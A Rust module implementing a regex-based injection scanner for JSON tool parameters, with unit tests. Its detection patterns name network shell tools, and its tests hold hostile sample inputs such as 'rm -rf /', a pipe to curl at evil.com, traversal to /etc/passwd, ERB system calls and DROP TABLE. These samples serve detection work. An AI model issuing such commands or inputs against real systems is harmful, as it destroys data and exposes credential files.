//! Payload scanner — injection detection in tool parameters.

use regex::Regex;
use std::sync::LazyLock;

static SQL_INJECTION: LazyLock<Regex> = LazyLock::new(|| {
    Regex::new(r"(?i)(\b(union|select|insert|update|delete|drop|alter|exec|execute)\b.*\b(from|into|table|where|set)\b|--|;.*\b(drop|delete|update)\b)").unwrap()
});

static SHELL_INJECTION: LazyLock<Regex> = LazyLock::new(|| {
    Regex::new(r"[;&|`$]\s*(rm|cat|curl|wget|nc|bash|sh|python|perl|ruby|chmod|chown)\b").unwrap()
});

static TEMPLATE_INJECTION: LazyLock<Regex> = LazyLock::new(|| {
    // Jinja2/Twig {{...}} with method-like content, ERB <% %>, ${...} with dot-access or builtins
    Regex::new(
        r"\{\{.*(\.|__|config|self|request).*\}\}|<%.*%>|\$\{.*(\.|Runtime|Process|exec).*\}",
    )
    .unwrap()
});

static PATH_TRAVERSAL: LazyLock<Regex> =
    LazyLock::new(|| Regex::new(r"(?i)\.\./|\.\.\\|%2e%2e").unwrap());

/// Maximum JSON nesting depth before scanning is aborted.
const MAX_SCAN_DEPTH: usize = 64;

/// Scan a JSON value for injection patterns. Returns threat description if found.
#[must_use]
pub fn scan(params: &serde_json::Value) -> Option<&'static str> {
    let mut result = None;
    walk(params, &mut result, 0);
    result
}

/// Recursively walk JSON, scanning only string leaves.
fn walk(value: &serde_json::Value, result: &mut Option<&'static str>, depth: usize) {
    if result.is_some() {
        return; // Short-circuit once a threat is found.
    }
    if depth > MAX_SCAN_DEPTH {
        return; // Prevent stack overflow on deeply nested payloads.
    }
    match value {
        serde_json::Value::String(s) => {
            *result = scan_text(s);
        }
        serde_json::Value::Array(arr) => {
            for item in arr {
                walk(item, result, depth + 1);
            }
        }
        serde_json::Value::Object(map) => {
            for v in map.values() {
                walk(v, result, depth + 1);
            }
        }
        _ => {} // Numbers, bools, null — nothing to scan.
    }
}

#[inline]
fn scan_text(text: &str) -> Option<&'static str> {
    if SQL_INJECTION.is_match(text) {
        return Some("SQL injection pattern");
    }
    if SHELL_INJECTION.is_match(text) {
        return Some("shell injection pattern");
    }
    if TEMPLATE_INJECTION.is_match(text) {
        return Some("template injection pattern");
    }
    if PATH_TRAVERSAL.is_match(text) {
        return Some("path traversal pattern");
    }
    None
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn detect_sql_injection() {
        let params = serde_json::json!({"query": "SELECT * FROM users WHERE id=1 UNION SELECT * FROM passwords"});
        assert!(scan(&params).unwrap().contains("SQL"));
    }

    #[test]
    fn detect_shell_injection() {
        let params = serde_json::json!({"cmd": "hello; rm -rf /"});
        assert!(scan(&params).unwrap().contains("shell"));
    }

    #[test]
    fn detect_path_traversal() {
        let params = serde_json::json!({"path": "../../../etc/passwd"});
        assert!(scan(&params).unwrap().contains("path traversal"));
    }

    #[test]
    fn clean_params_pass() {
        let params = serde_json::json!({"name": "hello world", "count": 42});
        assert!(scan(&params).is_none());
    }

    #[test]
    fn detect_template_injection() {
        let params = serde_json::json!({"input": "{{config.items()}}"});
        assert!(scan(&params).unwrap().contains("template"));
    }

    #[test]
    fn allow_benign_template_literal() {
        let params = serde_json::json!({"msg": "Hello ${username}, welcome!"});
        assert!(scan(&params).is_none());
    }

    #[test]
    fn detect_nested_injection() {
        let params = serde_json::json!({
            "outer": {
                "inner": {
                    "deep": "hello; rm -rf /"
                }
            }
        });
        assert!(scan(&params).unwrap().contains("shell"));
    }

    #[test]
    fn detect_injection_in_array() {
        let params = serde_json::json!({"items": ["safe", "also safe", "SELECT * FROM users WHERE 1=1 UNION SELECT * FROM passwords"]});
        assert!(scan(&params).unwrap().contains("SQL"));
    }

    #[test]
    fn non_string_values_pass() {
        let params = serde_json::json!({
            "count": 42,
            "active": true,
            "data": null,
            "scores": [1, 2, 3]
        });
        assert!(scan(&params).is_none());
    }

    #[test]
    fn empty_params_pass() {
        assert!(scan(&serde_json::json!({})).is_none());
        assert!(scan(&serde_json::json!(null)).is_none());
        assert!(scan(&serde_json::json!([])).is_none());
    }

    #[test]
    fn detect_backslash_path_traversal() {
        let params = serde_json::json!({"path": "..\\..\\windows\\system32"});
        assert!(scan(&params).unwrap().contains("path traversal"));
    }

    #[test]
    fn detect_url_encoded_traversal() {
        let params = serde_json::json!({"path": "%2e%2e/etc/passwd"});
        assert!(scan(&params).unwrap().contains("path traversal"));
    }

    #[test]
    fn detect_uppercase_url_encoded_traversal() {
        let params = serde_json::json!({"path": "%2E%2E/etc/shadow"});
        assert!(scan(&params).unwrap().contains("path traversal"));
    }

    #[test]
    fn detect_mixed_case_url_encoded_traversal() {
        let params = serde_json::json!({"path": "%2e%2E/%2E%2e/etc/passwd"});
        assert!(scan(&params).unwrap().contains("path traversal"));
    }

    #[test]
    fn detect_erb_template() {
        let params = serde_json::json!({"input": "<%= system('id') %>"});
        assert!(scan(&params).unwrap().contains("template"));
    }

    #[test]
    fn detect_sql_drop_table() {
        let params = serde_json::json!({"q": "1; DROP TABLE users"});
        assert!(scan(&params).unwrap().contains("SQL"));
    }

    #[test]
    fn detect_shell_pipe() {
        let params = serde_json::json!({"cmd": "data| curl http://evil.com"});
        assert!(scan(&params).unwrap().contains("shell"));
    }

    #[test]
    fn detect_shell_backtick() {
        let params = serde_json::json!({"cmd": "file`rm /tmp/data`"});
        assert!(scan(&params).unwrap().contains("shell"));
    }

    #[test]
    fn detect_jinja2_self_access() {
        let params = serde_json::json!({"tpl": "{{self.__class__.__mro__}}"});
        assert!(scan(&params).unwrap().contains("template"));
    }

    #[test]
    fn deep_nesting_aborts_at_limit() {
        // Build 70-level deep JSON — exceeds MAX_SCAN_DEPTH (64)
        let mut val = serde_json::json!("hello; rm -rf /");
        for _ in 0..70 {
            val = serde_json::json!({"nested": val});
        }
        // The injection is deeper than 64 levels, so scanner should NOT find it
        assert!(scan(&val).is_none());
    }

    #[test]
    fn deep_nesting_within_limit_detected() {
        // Build 60-level deep JSON — within MAX_SCAN_DEPTH (64)
        let mut val = serde_json::json!("hello; rm -rf /");
        for _ in 0..60 {
            val = serde_json::json!({"nested": val});
        }
        // The injection is within 64 levels, scanner should find it
        assert!(scan(&val).is_some());
    }

    #[test]
    fn detect_encoded_double_traversal() {
        // Double-encoded traversal should still be caught by case-insensitive %2e%2e
        let params = serde_json::json!({"path": "%2E%2e/%2e%2E/sensitive"});
        assert!(scan(&params).unwrap().contains("path traversal"));
    }

    #[test]
    fn detect_sql_with_comments() {
        // SQL injection with comment-based obfuscation
        let params = serde_json::json!({"q": "1; DROP TABLE users"});
        assert!(scan(&params).is_some());
    }

    #[test]
    fn large_clean_payload_passes() {
        // Ensure scanner handles large clean payloads without false positives
        let big_text = "a".repeat(100_000);
        let params = serde_json::json!({"data": big_text});
        assert!(scan(&params).is_none());
    }

    #[test]
    fn short_circuit_on_first_threat() {
        // Both SQL and shell patterns present — should return whichever walks first
        let params = serde_json::json!({
            "a": "SELECT * FROM users WHERE 1=1 UNION SELECT * FROM passwords",
            "b": "hello; rm -rf /"
        });
        // Should find something (order depends on JSON map iteration, but should find at least one)
        assert!(scan(&params).is_some());
    }
}